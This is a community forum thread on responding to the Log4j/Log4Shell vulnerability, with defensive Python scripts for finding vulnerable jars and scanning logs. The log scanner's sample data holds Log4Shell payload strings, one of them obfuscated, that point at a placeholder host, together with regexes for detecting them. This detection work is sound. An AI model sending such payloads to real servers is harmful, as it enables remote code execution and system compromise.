2021-12-13T05:32:00Z

What does the Log4j/Log4Shell vulnerability mean for your company?

EB
5 Answers

SimonClark - PeerSpot reviewer
Real User
Top 5 Leaderboard
2021-12-14T09:39:07Z
Dec 14, 2021

This vulnerability is particularly critical because Log4j is widely used in open source and commercial software, and remote exploitation of the vulnerability against any internet-facing server is trivial using a single HTTP POST. Exploitation results in full system compromise. The vulnerability has a CVSS score of 10 out of a possible 10, meaning it is as bad as it gets.


Our SOC has launched a new app that detects the presence of vulnerable versions of Log4j; however, detecting it does not mean you have been exploited.


My advice: Scan your network to get a full visibility report, i.e. find all your legacy and shadow IT that you didn't know existed, which means you should find all potential instances of Log4j; patch all of the Log4j environments; monitor your systems 24/7 using your SOC; and if you don't have a SOC, invest in a Managed SOC provider.
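The "find all potential instances of Log4j" step above is where most teams got stuck, because log4j-core rarely sits in a package manager's database: it is bundled inside application jars, WARs and fat jars. The following Python script is an added example (not code from the answer above or from any PeerSpot vendor) that walks a directory tree, opens every archive, recurses into archives nested inside them, and reports the log4j-core version from its Maven `pom.properties` together with whether `JndiLookup.class` is still present. The sample jars it builds in a temporary directory are constructed for the demo, and the version strings `sample-old` and `sample-patched` are placeholders, not real Log4j releases. A present class is not proof of exposure on its own; compare the reported version against the vendor's current advisory. An absent class in a log4j-core jar indicates the documented "remove JndiLookup.class" mitigation was applied.

```python
"""Inventory Log4j 2 core jars on disk, including jars embedded in WAR/EAR or
fat-jar archives, and report whether each still contains JndiLookup.class."""
import io
import os
import tempfile
import zipfile
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Class behind the JNDI lookup feature abused by Log4Shell, and the Maven
# metadata file inside log4j-core that records its version.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


@dataclass
class Finding:
    path: str              # on-disk path; "!" separates nested archive members
    version: str           # value from pom.properties, or "unknown"
    has_jndi_lookup: bool  # False if the class was stripped out as a mitigation


def _version_from(zf: zipfile.ZipFile) -> Optional[str]:
    """Read version=... from log4j-core's pom.properties, if the file exists."""
    try:
        text = zf.read(POM_PROPS).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in text.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def _scan_archive(zf: zipfile.ZipFile, shown: str, out: List[Finding]) -> None:
    names = set(zf.namelist())
    version = _version_from(zf)
    if version is not None or JNDI_LOOKUP in names:
        out.append(Finding(shown, version or "unknown", JNDI_LOOKUP in names))
    # Recurse into archives packed inside this one (WEB-INF/lib, fat jars).
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                inner = zipfile.ZipFile(io.BytesIO(zf.read(name)))
            except zipfile.BadZipFile:
                continue
            with inner:
                _scan_archive(inner, f"{shown}!{name}", out)


def scan_tree(root: str) -> List[Finding]:
    """Walk a directory tree and collect findings for every archive in it."""
    out: List[Finding] = []
    for dirpath, _, filenames in os.walk(root):
        for fn in sorted(filenames):
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            full = os.path.join(dirpath, fn)
            try:
                zf = zipfile.ZipFile(full)
            except (zipfile.BadZipFile, OSError):
                continue
            with zf:
                _scan_archive(zf, full, out)
    return out


def _make_jar(target, version: str, include_jndi: bool) -> None:
    """Constructed sample: a minimal 'log4j-core' jar with a placeholder version."""
    with zipfile.ZipFile(target, "w") as zf:
        zf.writestr(POM_PROPS, "groupId=org.apache.logging.log4j\n"
                               f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # placeholder bytes


def build_sample_tree(root: str) -> None:
    """Constructed layout: a jar with the class, a jar with it removed, and a
    WAR embedding the first jar under WEB-INF/lib (the case naive scans miss)."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib, exist_ok=True)
    _make_jar(os.path.join(lib, "log4j-core-sample-old.jar"), "sample-old", True)
    _make_jar(os.path.join(lib, "log4j-core-sample-patched.jar"), "sample-patched", False)
    buf = io.BytesIO()
    _make_jar(buf, "sample-old", True)
    with zipfile.ZipFile(os.path.join(lib, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/log4j-core-sample-old.jar", buf.getvalue())


def demo() -> List[Tuple[str, str, bool]]:
    """Build the sample tree in a temp dir, scan it, return root-relative rows."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        rows = []
        for f in scan_tree(tmp):
            outer, _, inner = f.path.partition("!")
            rel = os.path.relpath(outer, tmp).replace(os.sep, "/")
            rows.append((rel + ("!" + inner if inner else ""), f.version, f.has_jndi_lookup))
        return sorted(rows)


if __name__ == "__main__":
    for path, version, jndi in demo():
        print(f"{path}: version={version} JndiLookup={'present' if jndi else 'absent'}")
```

Point `scan_tree()` at an application server's install directory or a container image's extracted filesystem; the `!`-separated paths tell you which deployable to rebuild rather than only which host is affected. Shaded or renamed copies of log4j-core that drop the Maven metadata still show up, because the class-name check does not depend on `pom.properties`.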

EB
Community Manager
Dec 14, 2021

@SimonClark thank you for your answer and for the advice!

BH
Real User
2021-12-13T16:43:38Z
Dec 13, 2021

Yet another chance to test our incident response procedures. 


So far I would say we're a B: good on the process, an A on team response and interactions, and about a B on reducing threat risk.


Identifying your external assets exposed to this vulnerability is your team's #1 priority, then mitigate or patch (if available) the threat.


You also have to notify and communicate with any 3rd party to make sure they're aware so they can start the same process. You ALSO need to be fully aware of your vendors' weaknesses and defenses (mitigations, patches, knowledge and reaction time). 


Then be prepared to roll out patches or in this case shut systems down OR put mitigations in place immediately to mitigate risk to the entire environment.

Jairo Willian Pereira - PeerSpot reviewer
Real User
Top 5
2021-12-13T11:53:51Z
Dec 13, 2021

One excellent opportunity for the company to test your CMDB/Inventory (at medium and big companies). 


Tenable and, I think, other vulnerability scanners offer a specific plugin to check your infrastructure against Log4Shell.


If you don't have a VS, you can try looking at your logging system for evidence or use:


https://buff.ly/3lYZRh0
https://gist.github.com/SwitHa...


In the future, pre-defined and applied Patch Mgmt schedules need to come first (proactive), before scanners/vulns (reactive).
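For the "look at your logging system for evidence" route, the indicator is the `${jndi:` lookup string arriving in a logged field such as the User-Agent. The Python below is an added example (not part of the answer above and not one of the linked tools) showing why a plain grep is not enough: Log4j resolves nested lookups, so `${lower:...}`, `${upper:...}` and the `${x:-default}` form have to be flattened before the search. The access log lines are constructed for the demo (RFC 5737 addresses, `.invalid` hostnames); `normalise` and `find_indicators` are names chosen here. Hits only show that a payload reached a logging path, not that anything was exploited, which is the same caveat the first answer makes about finding vulnerable versions; run it over URL-decoded fields, since this example does not decode encodings itself.

```python
"""Scan web-server access log lines for the JNDI lookup string that triggers
Log4Shell, after collapsing the nested lookups used to hide the plain form."""
import re
from typing import Iterable, List, Tuple

# ${lower:X} / ${upper:X} resolve to X; ${anything:-X} resolves to its default X.
# A naive search for "${jndi:" misses both, so they are flattened first.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def normalise(line: str) -> str:
    """Resolve inner lookups repeatedly until the line stops changing."""
    prev = None
    while prev != line:
        prev = line
        line = _CASE_LOOKUP.sub(lambda m: m.group(1), line)
        line = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), line)
    return line


def find_indicators(lines: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, flattened line) for each line carrying ${jndi:."""
    hits: List[Tuple[int, str]] = []
    for number, raw in enumerate(lines, start=1):
        flat = normalise(raw)
        if _JNDI.search(flat):
            hits.append((number, flat))
    return hits


# Constructed sample access log: one ordinary request, one plain indicator,
# one indicator hidden behind a nested ${lower:} lookup.
SAMPLE_LOG = [
    '203.0.113.7 - - [13/Dec/2021:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [13/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://scanner.example.invalid/a}"',
    '203.0.113.9 - - [13/Dec/2021:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:dns://scanner.example.invalid/b}"',
]


if __name__ == "__main__":
    for number, flat in find_indicators(SAMPLE_LOG):
        print(f"line {number}: {flat}")
```

Feed it real lines with `find_indicators(open("access.log"))`; the flattened line in each hit is what to hand to the SOC, since it shows the lookup as Log4j would have evaluated it rather than as the sender disguised it.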

VG
Real User
Top 5 Leaderboard
2021-12-21T08:01:45Z
Dec 21, 2021

WhiteSource has released a utility to detect the Log4j vulnerability in the codebase.


Take a look at this if it helps. In our case, a lot of projects use Elasticsearch and Azure DevOps Server - both of them use log4j, and that's where additional fixes have to be done.


https://github.com/whitesource/log4j-detect-distribution

EB
Community Manager
Dec 21, 2021

@reviewer1572348 what have you been doing or what do you recommend to mitigate the issue? 

EB
Community Manager
2021-12-14T07:41:29Z
Dec 14, 2021

Hello @Jangsun KIM, @Cuneyt KALPAKOGLU Phd., @reviewer1572348, @Nachu Subramanian, @Letsogile-Baloi, @Nagaraj Sheshachalam, @Nadeem Syed, @reviewer1362132, @Chiheb Chebbi and @Abbasi Poonawala,


Can you please join this discussion and share your advice with the community?


Thank you!
